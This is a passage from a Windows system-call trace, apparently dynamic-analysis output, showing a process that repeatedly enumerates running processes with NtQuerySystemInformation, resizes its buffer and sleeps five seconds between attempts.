BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0123.274] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0123.275] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0123.277] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0123.278] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0123.287] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0123.288] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0123.289] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0123.289] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0123.289] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0123.291] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0123.292] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0123.303] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0123.303] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0123.304] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0123.304] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0123.304] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0123.307] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0123.307] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0123.319] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0123.319] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0123.320] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0123.320] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0123.320] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0123.323] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0123.324] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0123.336] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0123.336] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0123.337] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0123.337] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0123.337] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0123.340] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0123.340] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0123.383] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0123.384] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0123.385] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0123.385] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0123.385] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0123.389] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0123.390] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0123.397] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0123.398] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0123.399] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0123.399] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0123.399] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0123.401] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0123.402] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0123.412] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0123.412] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0123.413] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0123.413] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0123.413] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0123.416] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0123.416] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0123.428] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0123.428] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0123.429] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0123.429] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0123.429] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0123.431] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0123.432] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0123.444] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0123.444] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0123.445] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0123.445] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0123.445] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0123.448] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0123.449] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0123.459] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0123.460] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0123.460] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0123.460] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0123.460] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0123.462] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0123.463] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0123.475] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0123.475] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0123.475] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0123.476] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0123.476] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0123.478] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0123.478] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0123.491] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0123.491] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0123.492] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0123.492] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0123.492] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0123.495] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0123.495] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0123.506] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0123.507] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0123.507] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0123.508] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0123.508] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0123.510] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0123.511] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0123.522] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0123.522] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0123.523] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0123.523] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0123.524] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0123.526] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0123.527] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0123.537] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0123.537] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0123.538] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0123.538] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0123.538] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0123.540] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0123.541] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0123.559] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0123.559] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0123.560] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0123.560] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0123.560] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0123.563] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0123.563] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0123.568] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0123.568] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0123.569] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0123.569] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0123.569] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0123.571] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0123.572] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0123.584] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0123.584] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0123.585] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0123.585] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0123.585] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0123.587] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0123.588] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0123.599] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0123.600] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0123.600] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0123.601] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0123.601] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0123.603] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0123.604] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0123.615] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0123.615] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0123.616] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0123.616] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0123.616] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0123.619] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0123.619] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0123.630] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0123.631] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0123.631] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0123.631] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 